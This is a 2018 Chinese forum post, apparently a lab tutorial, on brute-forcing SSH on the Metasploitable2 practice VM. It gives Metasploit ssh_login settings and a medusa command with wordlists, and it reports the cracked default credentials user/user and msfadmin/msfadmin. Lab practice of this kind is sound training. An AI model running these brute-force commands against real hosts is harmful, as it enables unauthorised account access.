薯片 发表于 2018-9-3 16:48:35

对metasploitble2测试平台进行ssh爆破


对metasploitble测试平台进行ssh爆破
首先要准备暴破字典,一个用户字典,一个密码字典,也可以一个字典同时当用户名和密码用。可以在创建一个目录并创建这两个字典 (mkdir /tools/zidian   ; touch /tools/zidian/ssh_user.txt   ; touch /tools/zidian/ssh_pass.txt) 字典内容随心所欲,但是如果字典太大,可能会造成暴力破解时间过长。不过可以大大增加成功率。



ssh暴力破解有两种方法
一是使用metasploit,搜索 (search)ssh_login 这个工具进行暴力破解,需要设置用户名字典 set USER_FILE/tools/zidian/ssh_user.txt 和密码字典 set PASS_FILE/tools/zidian/ssh_pass.txt最重要的是设置目标IP set RHOST 192.168.1.1 还有设置一下线程 set THREADS 1000 (根据自己电脑性能设置) 最后运行 run 。。开始暴力破解。



第二种方法是使用 medusa 爆破工具 -l指定地址 、-U 指定用户字典 - P指定密码字典 -M 选择爆破类型。使用方法: medusa -h 192.168.1.1 -U /tools/zidian/ssh_user.txt -P /tools/zidian/ssh_pass.txt -M ssh



OK ,可以看出,爆破出了两个账号和密码。一个是 user user 一个是 msfadmin msfadmin然后可以登录一下ssh 指定用户登录方法 ssh -l user(或是msfadmin)192.168.1.1 回车后输入密码后登录



不指定用户:ssh 192.168.1.1
指定用户:
ssh -l user 192.168.1.1
ssh user@192.168.1.1

如果修改过ssh登录端口的可以:
ssh -p 12333 192.168.1.1
ssh -l user -p 12333 192.168.1.1
ssh -p 12333 user@192.168.1.1

薯片 发表于 2018-9-3 17:03:41

给自己顶一下
页: [1]
查看完整版本: 对metasploitble2测试平台进行ssh爆破